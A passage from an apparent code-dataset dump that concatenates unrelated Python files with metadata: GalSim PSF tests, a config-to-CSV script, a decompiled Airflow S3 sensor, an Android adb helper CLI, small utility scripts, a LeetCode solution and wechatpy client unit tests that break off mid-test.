\"\"\"\n import time\n atm = galsim.Atmosphere(screen_size=10.0, altitude=[0,1,2,3], r0_500=0.2)\n # Should be ~seconds if _prepareDraw() gets executed, ~0.01s otherwise.\n psf = atm.makePSF(lam=500.0, diam=1.0, exptime=15.0, time_step=0.025)\n t0 = time.time()\n psf.drawImage(method='phot', n_photons=1e3)\n t1 = time.time()\n assert (t1-t0) < 0.1, \"Photon-shooting took too long ({0} s).\".format(t1-t0)\n\n\nif __name__ == \"__main__\":\n test_aperture()\n test_atm_screen_size()\n test_structure_function()\n test_phase_screen_list()\n test_frozen_flow()\n test_phase_psf_reset()\n test_phase_psf_batch()\n test_opt_indiv_aberrations()\n test_scale_unit()\n test_stepk_maxk()\n test_ne()\n test_phase_gradient_shoot()\n test_input()\n test_r0_weights()\n test_speedup()\n","sub_path":"tests/test_phase_psf.py","file_name":"test_phase_psf.py","file_ext":"py","file_size_in_byte":28461,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"313882796","text":"import json\nimport pandas as pd\n\nimport pprint\n\ndef config_to_df(config):\n\n platforms = []\n meas_types = []\n scales = []\n measurement_names = []\n measurement_functions = []\n meas_args = []\n metric_names = []\n metric_funcs = []\n metric_args = []\n temporals = []\n\n for platform in config.keys():\n for meas_type in config[platform]:\n for scale in config[platform][meas_type]:\n for meas_name in config[platform][meas_type][scale]:\n \n meas = config[platform][meas_type][scale][meas_name] \n\n if 'measurement' in config[platform][meas_type][scale][meas_name].keys():\n\n for metric_name in meas['metrics'].keys():\n\n measurement_functions.append(meas['measurement'])\n metric_names.append(metric_name)\n metric_funcs.append(meas['metrics'][metric_name]['metric'])\n platforms.append(platform)\n meas_types.append(meas_type)\n scales.append(scale)\n measurement_names.append(meas_name)\n\n if 'metric_args' in meas['metrics'][metric_name]:\n metric_args.append(meas['metrics'][metric_name]['metric_args'])\n else:\n metric_args.append({})\n\n if 'temporal_vs_batch' in meas.keys():\n temporals.append(meas['temporal_vs_batch'])\n else:\n temporals.append('Batch')\n\n if 'measurement_args' in meas.keys():\n meas_args.append(meas['measurement_args'])\n else:\n meas_args.append({}) \n else:\n print('No measurement:',meas_name)\n\n df = pd.DataFrame({'Platform':platforms,\n 'Measurement Type':meas_types,\n 'Group Scale': scales,\n 'Measurement': measurement_names,\n 'Measurement Function': measurement_functions,\n 'Measurement Args': meas_args,\n 'Metrics': metric_names,\n 'Metric Functions':metric_funcs,\n 'Metric Args':metric_args,\n 'Temporal':temporals})\n\n\n return(df)\n\n\ndef main():\n fn = 'cp3_s1_configuration.json'\n\n with open(fn, 'r') as f:\n config = json.load(f)\n\n df = config_to_df(config)\n\n df.to_csv('cp3_s1_configuration.csv', index=False)\n\n fn = 'cp3_s2_configuration.json'\n\n\n with open(fn,'r') as f:\n config = json.load(f)\n\n df = config_to_df(config)\n\n df.to_csv('cp3_s2_configuration.csv',index=False)\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"examples/data/config_to_csv.py","file_name":"config_to_csv.py","file_ext":"py","file_size_in_byte":3008,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"596712653","text":"# uncompyle6 version 3.6.7\n# Python bytecode 3.6 (3379)\n# Decompiled from: Python 3.8.2 (tags/v3.8.2:7b3ab59, Feb 25 2020, 23:03:10) [MSC v.1916 64 bit (AMD64)]\n# Embedded file name: build/bdist.macosx-10.7-x86_64/egg/airflow/sensors/s3_prefix_sensor.py\n# Compiled at: 2019-09-11 03:47:34\n# Size of source mod 2**32: 3417 bytes\nfrom airflow.sensors.base_sensor_operator import BaseSensorOperator\nfrom airflow.utils.decorators import apply_defaults\n\nclass S3PrefixSensor(BaseSensorOperator):\n \"\"\"S3PrefixSensor\"\"\"\n template_fields = ('prefix', 'bucket_name')\n\n @apply_defaults\n def __init__(self, bucket_name, prefix, delimiter='/', aws_conn_id='aws_default', verify=None, *args, **kwargs):\n (super(S3PrefixSensor, self).__init__)(*args, **kwargs)\n self.bucket_name = bucket_name\n self.prefix = prefix\n self.delimiter = delimiter\n self.full_url = 's3://' + bucket_name + '/' + prefix\n self.aws_conn_id = aws_conn_id\n self.verify = verify\n\n def poke(self, context):\n self.log.info('Poking for prefix : %s in bucket s3://%s', self.prefix, self.bucket_name)\n from airflow.hooks.S3_hook import S3Hook\n hook = S3Hook(aws_conn_id=(self.aws_conn_id), verify=(self.verify))\n return hook.check_for_prefix(prefix=(self.prefix),\n delimiter=(self.delimiter),\n bucket_name=(self.bucket_name))","sub_path":"pycfiles/apache_ariatosca-0.2.0-py2-none-any/s3_prefix_sensor.cpython-36.py","file_name":"s3_prefix_sensor.cpython-36.py","file_ext":"py","file_size_in_byte":1388,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"542551255","text":"import os\nimport sys\nimport re\nimport time\nimport Helps\nfrom pydoc import help\nfrom sys import exit\n\nselected = None\n# {%count : (%serial_id, %platform)}\n\ndef execute(cmd, show):\n\tif cmd.startswith('adb') and selected:\n\t\tfor key in selected.keys():\n\t\t\tif key == 2:\n\t\t\t\tdevice = selected[key]\n\t\t\t\tcmd = cmd[0:3] + (' -s %s ' % device[0]) + cmd[4:]\n\t\t\tbreak\n\tif show:\n\t\tprint('cmd: %s' % cmd)\n\tf = os.popen(cmd, 'r')\n\trst = f.read()\n\tf.close()\n\treturn rst;\n\ndef numberic(value):\n\trst = re.match('[0-9]{1,}', value, flags=0)\n\treturn False if not rst else (True if rst.group() == value else False)\n\ndef root():\n\texecute('adb root', False)\n\ndef remount():\n\texecute('adb remount', False)\n\ndef dev():\n\tdatabase(['global', 'development_settings_enabled', '1'])\n\tstart(['-n', 'com.android.settings/.Settings'])\n\tstart(['-a', 'android.settings.APPLICATION_DEVELOPMENT_SETTINGS'])\n\ndef log():\n\tplat = 'mtk'\n\tif selected and len(selected) == 1:\n\t\tfor value in selected.values():\n\t\t\tplat = value[1]\n\t\t\tbreak\n\tif plat == 'mtk':\n\t\tstart(['-n', 'com.mediatek.mtklogger/.MainActivity'])\n\telif plat == 'sprd':\n\t\tstart(['-n', 'com.sprd.logmanager/.logui.LogMainActivity'])\n\telif plat == 'qcom':\n\t\tpass\n\ndef engmode():\n\tplat = 'mtk'\n\tif selected and len(selected) == 1:\n\t\tfor value in selected.values():\n\t\t\tplat = value[1]\n\t\t\tbreak\n\tdatabase(['global', 'development_settings_enabled', '1'])\n\tif plat == 'mtk':\n\t\tstart(['-n', 'com.mediatek.engineermode/.EngineerMode'])\n\telif plat == 'sprd':\n\t\tstart(['-n', 'com.sprd.engineermode/.EngineerModeActivity'])\n\telif plat == 'qcom':\n\t\tpass\n\ndef platform():\n\tcpu_info = execute('adb shell \\\"cat /proc/cpuinfo\\\"', False)\n\thardware = None\n\tfor line in cpu_info.split('\\n'):\n\t\tmatchObj = re.match('(?i)Hardware\\t*: (.*)', line)\n\t\tif matchObj:\n\t\t\thardware = matchObj.group(1)\n\t\t\tbreak\n\n\tif not hardware:\n\t\treturn 'unknown'\n\tif 'MT' in hardware:\n\t\treturn 'mtk'\n\telif 'Unisoc' in hardware:\n\t\treturn 'sprd'\n\telif 'Qualcomm' in hardware:\n\t\treturn 'qcom'\n\n\t# mtk_flag = execute('adb shell \\\"getprop | grep mtk\\\"', False)\n\t# if len(mtk_flag):\n\t# \treturn 'mtk'\n\t# else :\n\t# \tsprd_flag = execute('adb shell \\\"getprop | grep sprd\\\"', False)\n\t# \tif len(sprd_flag):\n\t# \t\treturn 'sprd'\n\t# \telse :\n\t# \t\tqcom_flag = execute('adb shell \\\"getprop | grep qcom\\\"', False)\n\t# \t\tif len(qcom_flag):\n\t# \t\t\treturn 'qcom'\n\treturn 'unknown'\n\ndef pulllog(argv=sys.argv[2:]):\n\tplat = 'mtk'\n\tif selected and len(selected) == 1:\n\t\tfor value in selected.values():\n\t\t\tplat = value[1]\n\t\t\tbreak\n\tsource = None\n\tif plat == 'mtk':\n\t\tsource = '/sdcard/mtklog/'\n\telif plat == 'sprd':\n\t\tsource = '/sdcard/ylog/'\n\telif plat == 'qcom':\n\t\tpass\n\n\tdst = argv[0] if len(argv) else ''\n\n\tif source:\n\t\tprint(execute('adb pull %s %s' % (source, dst), True))\n\ndef database(argv=sys.argv[2:], prt=False):\n\tif len(argv) >= 1:\n\t\ttable = argv[0]\n\t\tif table in ('system', 'secure', 'global') and len(argv) >= 2:\n\t\t\tname = argv[1]\n\t\t\tvalue = argv[2] if len(argv) >= 3 else None\n\t\t\tif value:\n\t\t\t\texecute('adb shell settings put %s %s %s' % (table, name, value), True)\n\t\t\tresult = execute('adb shell settings get %s %s' % (table, name), True)\n\t\t\tif prt:\n\t\t\t\tprint(result)\n\t\t\treturn result\n\treturn '-h'\n\ndef prop(argv=sys.argv[2:], prt=False):\n\tif len(argv) >= 1:\n\t\troot()\n\t\tkey = argv[0]\n\t\tvalue = argv[1] if len(argv) >= 2 else None\n\t\tif value:\n\t\t\texecute('adb shell setprop %s %s' % (key, value), True)\n\t\tresult = execute('adb shell getprop %s' % key, True)\n\t\tif prt:\n\t\t\tprint(result)\n\t\treturn result\n\treturn '-h'\n\ndef topact(argv=sys.argv[2:]):\n\trst = execute('adb shell \\\"dumpsys activity top | grep ACTIVITY\\\"', True)\n\tarray = rst.split('\\n')\n\thelp_flag = False\n\tfor item in array:\n\t\titem = item.lstrip().rstrip()\n\t\tif not len(item):\n\t\t\tcontinue\n\t\tprint(item)\n\t\tif len(argv) >= 1:\n\t\t\tmatchObj = re.match('ACTIVITY (.*)/(.*) ([0-9a-fA-F].*) pid=(.*)', item)\n\t\t\tif not matchObj or len(matchObj.groups()) < 4:\n\t\t\t\tcontinue\n\t\t\tpkg = matchObj.group(1)\n\t\t\tif argv[0] == '-p':\n\t\t\t\tprint(execute('adb shell pm path %s' % (pkg), True))\n\t\t\telif argv[0] == '-f':\n\t\t\t\tprint(execute('adb shell pm list packages -f %s' % (pkg), True))\n\t\t\telse :\n\t\t\t\thelp_flag = True\n\tif help_flag:\n\t\treturn '-h'\n\ndef focus():\n\tprint(execute('adb shell \\\"dumpsys activity | grep mFocusedActivity\\\"', True))\n\ndef brt(argv=sys.argv[2:]):\n\tdb_arg = ['system', 'screen_brightness']\n\tif len(argv) >= 1:\n\t\tif numberic(argv[0]) and int(argv[0]) >= 0:\n\t\t\tdb_arg.append(int(argv[0]))\n\t\telse :\n\t\t\treturn '-h'\n\tdatabase(db_arg, True)\n\ndef density(argv=sys.argv[2:]):\n\tif len(argv) >= 1:\n\t\tif numberic(argv[0]) and int(argv[0]) >= 0:\n\t\t\tprint(execute('adb shell wm density %d' % (int(argv[0])), True))\n\t\telse :\n\t\t\treturn '-h'\n\tprint(execute('adb shell wm density', True))\n\ndef size():\n\tprint(execute('adb shell wm size', True))\n\ndef sf(argv=sys.argv[2:]):\n\tdb_arg = ['system', 'screen_off_timeout']\n\tif len(argv) >= 1:\n\t\tparm = argv[0]\n\t\tlast = parm[-1:]\n\t\tif last == 's' and numberic(parm[:-1]):\n\t\t\ttime = int(parm[:-1]) * 1000\n\t\telif last == 'm' and numberic(parm[:-1]):\n\t\t\ttime = int(parm[:-1]) * 60 * 1000\n\t\telif numberic(parm):\n\t\t\ttime = int(parm)\n\t\telse:\n\t\t\treturn '-h'\n\t\tdb_arg.append(time)\n\ttime = int(database(db_arg))\n\ttime_format = ('%dms' % time)\n\tif time >= 1000 and time < (60 * 1000) :\n\t\ttime_format = ('%ds' % (time / 1000))\n\telif time >= (60 * 1000) and time < (60 * 60 * 1000) :\n\t\ttime_format = ('%dm' % (time / 1000 / 60))\n\tprint(time_format)\n\ndef start(argv=sys.argv[2:]):\n\tif len(argv) >= 2 and argv[0] in ('-a', '-n'):\n\t\tprint(execute('adb shell am start %s %s' % (argv[0], argv[1]), True))\n\telse :\n\t\treturn '-h'\n\ndef send_key(argv=sys.argv[2:]):\n\tif len(argv) >= 1:\n\t\tprint(execute('adb shell input keyevent %s' % (argv[0]), True))\n\telse :\n\t\treturn '-h'\n\ndef volume(argv=sys.argv[2:]):\n\ttimes = int(argv[1:]) if numberic(argv[1:]) else 1\n\tfirst = argv[0]\n\tkey = 'KEYCODE_VOLUME_UP' if first == '+' else ('KEYCODE_VOLUME_DOWN' if first == '-' else '')\n\tif key:\n\t\tindex = 0\n\t\twhile index < times:\n\t\t\tindex += 1\n\t\t\tsend_key([key])\n\ndef cap(argv=sys.argv[2:]):\n\tpath = 'sdcard/caps/'\n\texecute('adb shell mkdir -p %s' % (path), False)\n\tname = time.strftime('%Y-%m-%d_%H-%M-%S', time.localtime()) + '.png'\n\tdst = path + name\n\tprint(execute('adb shell screencap -p %s' % (dst), True))\n\tif len(argv) >= 1 :\n\t\tif argv[0] != '-p':\n\t\t\treturn '-h'\n\t\tlocal = argv[1] if len(argv) >= 2 else ''\n\t\tif local.endswith(os.sep):\n\t\t\tlocal = local + name\n\t\tprint(execute('adb pull %s %s' % (dst, local), True))\n\ndef record(argv=sys.argv[2:]):\n\tpath = 'sdcard/caps/'\n\texecute('adb shell mkdir -p %s' % (path), False)\n\tname = time.strftime('%Y-%m-%d_%H-%M-%S', time.localtime()) + '.mp4'\n\tdst = path + name\n\ttry:\n\t\tcmd = ('adb shell screenrecord %s' % (dst))\n\t\tif len(argv) >= 1 :\n\t\t\tfor item in argv:\n\t\t\t\tif item == '-b':\n\t\t\t\t\tcmd = cmd + ' --bugreport'\n\t\t\t\t\tbreak\n\t\texecute(cmd, True)\n\texcept KeyboardInterrupt as e:\n\t\tprint('\\n')\n\tif len(argv) >= 1 :\n\t\tfor item in argv:\n\t\t\t\tif item == '-p':\n\t\t\t\t\tlocal = ''\n\t\t\t\t\tif len(argv) >= argv.index('-p') + 2 :\n\t\t\t\t\t\tlocal = argv[argv.index('-p') + 1]\n\t\t\t\t\tlocal = '' if local == '-b' else local\n\t\t\t\t\tif local.endswith(os.sep):\n\t\t\t\t\t\tlocal = local + name\n\t\t\t\t\ttime.sleep(1)\n\t\t\t\t\tprint(execute('adb pull %s %s' % (dst, local), True))\n\t\t\t\t\tbreak\n\ndef kill(argv=sys.argv[2:]):\n\tif len(argv):\n\t\tpkg = argv[0]\n\t\trst = execute('adb shell ps', True)\n\t\troot()\n\t\tfor line in rst.split('\\n'):\n\t\t\t# if line.endswith(pkg):\n\t\t\tif pkg in line:\n\t\t\t\t# Splits a string separated by an unquantified amount of space\n\t\t\t\tobj = re.findall('[\\S.]+', line)\n\t\t\t\tif obj and len(obj) > 1:\n\t\t\t\t\tpid = obj[1]\n\t\t\t\t\tif numberic(pid):\n\t\t\t\t\t\texecute('adb shell kill %s' % pid, True)\n\telse :\n\t\treturn '-h'\n\ndef clear(argv=sys.argv[2:]):\n\tif len(argv):\n\t\tpkg = argv[0]\n\t\trst = execute('adb shell pm clear %s' % pkg, True)\n\telse :\n\t\treturn '-h'\n\ndef pushs(argv=sys.argv[2:]):\n\tsource = argv[0] if len(argv) else None\n\ttarget = argv[1] if len(argv) > 1 else None\n\n\tif not source or not os.path.exists(source) or os.path.isfile(source):\n\t\treturn '-h'\n\n\t# find 'anchor' as we wanted\n\tavailable = ('system', 'vendor')\n\t# print(source.split(os.sep))\n\tanchor = None\n\tfor item in available:\n\t\tif item in source.split(os.sep):\n\t\t\tanchor = item\n\t\t\tbreak\n\tif not anchor and target:\n\t\tfor item in available:\n\t\t\tif item in target.split('/'):\n\t\t\t\tanchor = item\n\t\t\t\tbreak\n\t# print('anchor = %s' % anchor)\n\n\tif not anchor:\n\t\treturn '-h'\n\n\tif not target:\n\t\tif not anchor:\n\t\t\treturn '-h'\n\t\telse:\n\t\t\t# find target from source\n\t\t\ttarget = source[source.find(anchor):]\n\n\troot()\n\tremount()\n\n\ttarget = target.replace('\\\\', '/')\n\t# print('push %s -> %s' % (source, target))\n\n\tfiles = getFiles(source)\n\t# print(files)\n\tif files:\n\t\tpush_items = {}\n\t\tfor source_file in files:\n\t\t\ttarget_file = None\n\t\t\tif anchor in source_file:\n\t\t\t\ttarget_file = source_file[source_file.find(anchor):]\n\t\t\telse:\n\t\t\t\ttarget_file = (target if target.endswith('/') else target + '/') + source_file\n\t\t\ttarget_file = target_file.replace('\\\\', '/')\n\t\t\tpush_items[source_file] = target_file\n\t\t\t# print('push %s -> %s' % (source_file, target_file))\n\n\t\tif len(push_items):\n\t\t\tfor key, value in push_items.items():\n\t\t\t\tprint('%s -> %s' % (key, value))\n\t\t\tconfirm = compatible_input('push above items, do you confirm?(y/n)')\n\t\t\tif confirm == 'y':\n\t\t\t\tfor key, value in push_items.items():\n\t\t\t\t\tprint(execute('adb push %s %s' % (key, value), False))\n\ndef getFiles(path):\n\tif not os.path.exists(path):\n\t\treturn None\n\tif os.path.isfile(path):\n\t\treturn path\n\tif path.endswith(os.sep):\n\t\tpath = path[:-1]\n\tfiles = os.listdir(path)\n\taf = []\n\tfor file in files:\n\t\tisfile = os.path.isfile(path + os.sep + file)\n\t\tif isfile:\n\t\t\taf.append(path + os.sep + file)\n\t\telse:\n\t\t\taf += getFiles(path + os.sep + file)\n\treturn af\n\ndef workspace(argv=sys.argv[2:]):\n\taction = 'com.freeme.workspace.ACTION_DEBUG'\n\tcomp1 = 'com.freeme.launcher/com.freeme.launcher.WorkspaceReceiver'\n\tcomp2 = 'com.freeme.biglauncher/com.freeme.biglauncher.launcher.component.WorkspaceReceiver'\n\texecute('adb shell am broadcast -a %s -n %s' % (action, comp1), True)\n\texecute('adb shell am broadcast -a %s -n %s' % (action, comp2), True)\n\tlocal = argv[0] if len(argv) else ''\n\texecute('adb pull /sdcard/launcher/ %s' % local, True)\n\ndef mute():\n\tprint(execute('adb shell media volume --show --stream 2 --set 0', True))\n\tprint(execute('adb shell media volume --show --stream 3 --set 0', True))\n\ndef watermark():\n\texecute('adb shell am broadcast -a android.droi.watermark.SECRET_CODE', True)\n\ndef uid(argv=sys.argv[2:]):\n\tpkg = argv[0] if len(argv) else None\n\tif not pkg:\n\t\treturn '-h'\n\n\tpackages_list = execute('adb shell cat /data/system/packages.list', True)\n\tpattern = '(^%s )([0-9]*)' % pkg\n\tuid = None\n\tfor line in packages_list.split('\\n'):\n\t\tobj = re.match(pattern, line)\n\t\tif obj:\n\t\t\tuid = obj.group(2)\n\t\t\tbreak\n\tprint('%s uid %s' % (pkg, uid if uid else 'not found'))\n\ndef compatible_input(prompt):\n\tif sys.version_info.major == 2:\n\t\treturn raw_input(prompt)\n\telse:\n\t\treturn input(prompt)\n\nif ( __name__ == \"__main__\"):\n\n\t# dump cmd\n\tcmd = sys.argv[1] if len(sys.argv) > 1 else ''\n\n\t# help child first\n\thelp_flag = ('-h', '--help')\n\tif set(help_flag) & set(sys.argv[2:]):\n\t\thelp('Helps.%s' % cmd)\n\t\texit()\n\n\t# first, find all the devices\n\tdevices = []\n\tfor line in execute('adb devices', False).split('\\n'):\n\t\tif line.find('\\t') > 0:\n\t\t\t# find platform and put to %devices\n\t\t\tid = line.split('\\t')[0]\n\t\t\tselected = {2 : (id, None)}\n\t\t\tselected = {2 : (id, platform())}\n\t\t\tdevices.append(selected)\n\n\tif selected:\n\t\tfor key in selected.keys():\n\t\t\tselected = {1 : selected[key]}\n\n\tif not len(devices):\n\t\tprint('no devices/emulators found!!!')\n\t\texit()\n\telif len(devices) >= 2:\n\t\t# show selection\n\t\tfor device in devices:\n\t\t\tfor key in device.keys():\n\t\t\t\tdevi = device[key]\n\t\t\t\tprint('%d - %s - %s' % (devices.index(device) + 1, devi[0], devi[1]))\n\t\t\t\tbreak\n\t\tipt = int(compatible_input('\\nmore than one device/emulator, please choose one: '))\n\t\tipt = 1 if ipt > len(devices) or ipt < 1 else ipt\n\t\tselected = devices[ipt - 1]\n\n\tcmd_process = {\n\t'dev'\t\t:\t[dev],\n\t'log'\t\t:\t[log],\n\t'engmode'\t:\t[engmode],\n\t'pulllog'\t:\t[pulllog],\n\t'topact'\t:\t[topact],\n\t'focus'\t\t:\t[focus],\n\t'brt'\t\t:\t[brt],\n\t'density'\t:\t[density],\n\t'size'\t\t:\t[size],\n\t'sf'\t\t:\t[sf],\n\t'start'\t\t:\t[start],\n\t'settings'\t:\t[start, [['-n', 'com.android.settings/.Settings']]],\n\t'key'\t\t:\t[send_key],\n\t'back'\t\t:\t[send_key, [['KEYCODE_BACK']]],\n\t'home'\t\t:\t[send_key, [['KEYCODE_HOME']]],\n\t'menu'\t\t:\t[send_key, [['KEYCODE_MENU']]],\n\t'power'\t\t:\t[send_key, [['KEYCODE_POWER']]],\n\t'shot'\t\t:\t[send_key, [['KEYCODE_CAMERA']]],\n\t'cap'\t\t:\t[cap],\n\t'record'\t:\t[record],\n\t'mute'\t\t:\t[mute],\n\t'db'\t\t:\t[database, [sys.argv[2:], True]],\n\t'prop'\t\t:\t[prop, [sys.argv[2:], True]],\n\t'kill'\t\t:\t[kill],\n\t'clear'\t\t:\t[clear],\n\t'pushs'\t\t:\t[pushs],\n\t'workspace'\t:\t[workspace],\n\t'watermark'\t:\t[watermark],\n\t'uid'\t\t:\t[uid],\n\t'[+-][0-9]'\t:\t[volume, [cmd]],\n\t'^(-h)$|^(--help)$'\t:\t[help, ['Helps.main']],\n\t}\n\n\t# find implementation\n\timplementation = cmd_process.get(cmd)\n\tif not implementation:\n\t\tfor key, impl in cmd_process.items():\n\t\t\tobj = re.match(key, cmd)\n\t\t\tif obj and obj.group() == cmd:\n\t\t\t\timplementation = impl\n\t\t\t\tbreak\n\n\t# implementation\n\tif implementation and len(implementation):\n\t\tfunc = implementation[0]\n\t\targv = implementation[1] if len(implementation) > 1 else None\n\t\trtn = func(*argv) if argv else func()\n\t\tif rtn in help_flag:\n\t\t\thelp('Helps.%s' % cmd)\n\t\texit()\n\n\tprint('wrong parameter, try \\'sc --help\\' to get more information')\n","sub_path":"short command/sc.py","file_name":"sc.py","file_ext":"py","file_size_in_byte":13415,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"386995284","text":"# -*- coding: utf-8 -*-\n# @Time : 2018/11/4 15:49\n# @Author : Arjun\n\nimport pandas as pd\n\ninputfile = \"./data/meidi_jd.txt\"\noutputfile = \"./data/meidi_jd_process_1.txt\"\ndata = pd.read_csv(inputfile, encoding='utf-8', header=None)\nl1 = len(data)\n\"\"\"原始数据去重\"\"\"\ndata = pd.DataFrame(data[0].unique())\n\"\"\"原始数据去重\"\"\"\n# data = data.drop_duplicates()\nl2 = len(data)\ndata.to_csv(outputfile, index=False, header=False, encoding='utf-8')\nprint(u'删除了%s条评论' %(l1-l2))","sub_path":"data_analysis/clean.py","file_name":"clean.py","file_ext":"py","file_size_in_byte":492,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"616566468","text":"from typing import List\n\n\nclass NumArray:\n\n def __init__(self, nums: List[int]):\n # 前缀和\n self.nums = nums\n self.pre_sum = [0] # the first value is 0.\n pre = 0\n for num in nums:\n pre += num\n self.pre_sum.append(pre)\n\n def sumRange(self, left: int, right: int) -> int:\n return self.pre_sum[right + 1] - self.pre_sum[left]\n\n\n# Your NumArray object will be instantiated and called as such:\nobj = NumArray([-2, 0, 3, -5, 2, -1])\nparam_1 = obj.sumRange(0,2)\nprint(param_1)\n","sub_path":"Array/303-RangeSumQueryImmutable.py","file_name":"303-RangeSumQueryImmutable.py","file_ext":"py","file_size_in_byte":543,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"198672551","text":"from tests.tests_walk_and_find import TestCasesWalkAndFind\nfrom solution.walk_and_find import WalkAndFind\n\nif __name__ == \"__main__\":\n ###################################\n # Tests\n ###################################\n test_cases: TestCasesWalkAndFind = TestCasesWalkAndFind()\n test_dictory_base_path: str = r'.\\tests\\test_directories'\n\n test_cases.execute_tests_single_file_at_root(test_dictory_base_path)\n test_cases.execute_tests_single_subdirectory(test_dictory_base_path)\n test_cases.execute_tests_single_subdirectory_nested(test_dictory_base_path)\n test_cases.execute_tests_multiple_subdirectories_nested(\n test_dictory_base_path)\n test_cases.execute_tests_multiple_subdirectories_nested_no_file_match(\n test_dictory_base_path)\n test_cases.execute_tests_no_files_or_directories(test_dictory_base_path)\n test_cases.execute_tests_path_does_not_exist(test_dictory_base_path)\n\n ###################################\n # Demo\n ###################################\n demo_path: str = r'.\\tests\\test_directories\\case_03'\n suffix: str = \".c\"\n walk_and_find_instance: WalkAndFind = WalkAndFind()\n\n file_paths: list = walk_and_find_instance.find_files_with_suffix(\n suffix, demo_path)\n for file_path in file_paths:\n print(file_path)\n\n \"\"\"\n Output:\n .\\tests\\test_directories\\case_03\\subdir1\\a.c\n .\\tests\\test_directories\\case_03\\subdir3\\subsubdir1\\b.c\n .\\tests\\test_directories\\case_03\\subdir5\\a.c\n .\\tests\\test_directories\\case_03\\t1.c\n \"\"\"\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1540,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"41670755","text":"# -*- coding: utf-8 -*-\nimport io\nimport os\nimport json\nimport unittest\n\nfrom httmock import urlmatch, HTTMock, response\n\nfrom wechatpy.work import WeChatClient\nfrom wechatpy.exceptions import WeChatClientException\n\n\n_TESTS_PATH = os.path.abspath(os.path.dirname(__file__))\n_FIXTURE_PATH = os.path.join(_TESTS_PATH, 'fixtures', 'work')\n\n\n@urlmatch(netloc=r'(.*\\.)?qyapi\\.weixin\\.qq\\.com$')\ndef wechat_api_mock(url, request):\n path = url.path.replace('/cgi-bin/', '').replace('/', '_')\n res_file = os.path.join(_FIXTURE_PATH, '%s.json' % path)\n content = {\n 'errcode': 99999,\n 'errmsg': 'can not find fixture %s' % res_file,\n }\n headers = {\n 'Content-Type': 'application/json'\n }\n try:\n with open(res_file, 'rb') as f:\n content = json.loads(f.read().decode('utf-8'))\n except (IOError, ValueError) as e:\n content['errmsg'] = 'Loads fixture {0} failed, error: {1}'.format(\n res_file,\n e\n )\n return response(200, content, headers, request=request)\n\n\nclass WeChatClientTestCase(unittest.TestCase):\n corp_id = '123456'\n secret = '123456'\n\n def setUp(self):\n self.client = WeChatClient(self.corp_id, self.secret)\n\n def test_init_client_with_access_token(self):\n client = WeChatClient(self.corp_id, self.secret, access_token='abcdef')\n assert client\n\n def test_fetch_access_token(self):\n with HTTMock(wechat_api_mock):\n token = self.client.fetch_access_token()\n self.assertEqual('1234567890', token['access_token'])\n self.assertEqual(7200, token['expires_in'])\n self.assertEqual('1234567890', self.client.access_token)\n\n def test_get_wechat_ips(self):\n with HTTMock(wechat_api_mock):\n res = self.client.misc.get_wechat_ips()\n self.assertEqual(['127.0.0.1'], res)\n\n def test_department_create(self):\n with HTTMock(wechat_api_mock):\n res = self.client.department.create('Test')\n self.assertEqual(2, res['id'])\n\n def test_department_update(self):\n with HTTMock(wechat_api_mock):\n res = self.client.department.update(2, 'Test 1')\n self.assertEqual(0, res['errcode'])\n\n def test_department_delete(self):\n with HTTMock(wechat_api_mock):\n res = self.client.department.delete(2)\n self.assertEqual(0, res['errcode'])\n\n def test_department_get(self):\n with HTTMock(wechat_api_mock):\n res = self.client.department.get()\n self.assertEqual(2, len(res))\n\n def test_department_get_users(self):\n with HTTMock(wechat_api_mock):\n res = self.client.department.get_users(2)\n self.assertEqual(1, len(res))\n\n def test_department_get_users_detail(self):\n with HTTMock(wechat_api_mock):\n res = self.client.department.get_users(2, simple=False)\n self.assertEqual(1, len(res))\n\n def test_department_map_users(self):\n with HTTMock(wechat_api_mock):\n users = self.client.department.get_map_users(2, key='email')\n self.assertEqual(users, {'zhangthree@wechat.com': 'zhangthree-userid'})\n\n users = self.client.department.get_map_users(key='mobile')\n self.assertEqual(users, {'15723333333': 'zhangthree-userid'})\n\n def test_tag_create(self):\n with HTTMock(wechat_api_mock):\n res = self.client.tag.create('test')\n self.assertEqual('1', res['tagid'])\n\n def test_tag_update(self):\n with HTTMock(wechat_api_mock):\n res = self.client.tag.update(1, 'test')\n self.assertEqual(0, res['errcode'])\n\n def test_tag_delete(self):\n with HTTMock(wechat_api_mock):\n res = self.client.tag.delete(1)\n self.assertEqual(0, res['errcode'])\n\n def test_tag_get_users(self):\n with HTTMock(wechat_api_mock):\n res = self.client.tag.get_users(1)\n self.assertEqual(1, len(res['userlist']))\n self.assertEqual(1, len(res['partylist']))\n\n def test_tag_add_users(self):\n with HTTMock(wechat_api_mock):\n res = self.client.tag.add_users(1, [1, 2, 3])\n self.assertEqual(0, res['errcode'])\n\n def test_tag_delete_users(self):\n with HTTMock(wechat_api_mock):\n res = self.client.tag.delete_users(1, [1, 2, 3])\n self.assertEqual(0, res['errcode'])\n\n def test_tag_list(self):\n with HTTMock(wechat_api_mock):\n res = self.client.tag.list()\n self.assertEqual(2, len(res))\n\n def test_batch_sync_user(self):\n with HTTMock(wechat_api_mock):\n res = self.client.batch.sync_user(\n 'http://example.com',\n '123456',\n '123456',\n '12345678'\n )\n self.assertEqual(0, res['errcode'])\n\n def test_batch_replace_user(self):\n with HTTMock(wechat_api_mock):\n res = self.client.batch.replace_user(\n 'http://example.com',\n '123456',\n '123456',\n '12345678'\n )\n self.assertEqual(0, res['errcode'])\n\n def test_batch_replace_party(self):\n with HTTMock(wechat_api_mock):\n res = self.client.batch.replace_party(\n 'http://example.com',\n '123456',\n '123456',\n '12345678'\n )\n self.assertEqual(0, res['errcode'])\n\n def test_batch_get_result(self):\n with HTTMock(wechat_api_mock):\n res = self.client.batch.get_result('123456')\n self.assertEqual(0, res['errcode'])\n self.assertEqual(1, res['status'])\n\n def test_jsapi_get_ticket(self):\n with 